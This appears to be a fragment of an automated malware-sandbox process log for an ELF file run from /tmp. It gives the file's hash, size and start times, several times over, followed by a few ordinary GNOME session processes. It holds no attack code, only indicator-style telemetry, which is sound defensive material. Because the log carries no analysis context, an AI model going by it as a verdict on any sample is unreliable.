                                                MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                Start time (UTC):17:23:51
                                                Start date (UTC):12/01/2024
                                                Path:/tmp/zogsXPGVgB.elf
                                                Arguments:-
                                                File size:5388968 bytes
                                                MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                Start time (UTC):17:23:51
                                                Start date (UTC):12/01/2024
                                                Path:/tmp/zogsXPGVgB.elf
                                                Arguments:-
                                                File size:5388968 bytes
                                                MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                Start time (UTC):17:23:51
                                                Start date (UTC):12/01/2024
                                                Path:/tmp/zogsXPGVgB.elf
                                                Arguments:-
                                                File size:5388968 bytes
                                                MD5 hash:ae65271c943d3451b7f026d1fadccea6
                                                Start time (UTC):17:23:51
                                                Start date (UTC):12/01/2024
                                                Path:/tmp/zogsXPGVgB.elf
                                                Arguments:-
                                                File size:5388968 bytes
                                                MD5 hash:ae65271c943d3451b7f026d1fadccea6
                                                Start time (UTC):17:23:51
                                                Start date (UTC):12/01/2024
                                                Path:/tmp/zogsXPGVgB.elf
                                                Arguments:-
                                                File size:5388968 bytes
                                                MD5 hash:ae65271c943d3451b7f026d1fadccea6
                                                Start time (UTC):17:23:52
                                                Start date (UTC):12/01/2024
                                                Path:/usr/libexec/gnome-session-binary
                                                Arguments:-
                                                File size:334664 bytes
                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                Start time (UTC):17:23:52
                                                Start date (UTC):12/01/2024
                                                Path:/bin/sh
                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Start time (UTC):17:23:52
                                                Start date (UTC):12/01/2024
                                                Path:/usr/libexec/gsd-print-notifications
                                                Arguments:/usr/libexec/gsd-print-notifications
                                                File size:51840 bytes
                                                MD5 hash:71539698aa691718cee775d6b9450ae2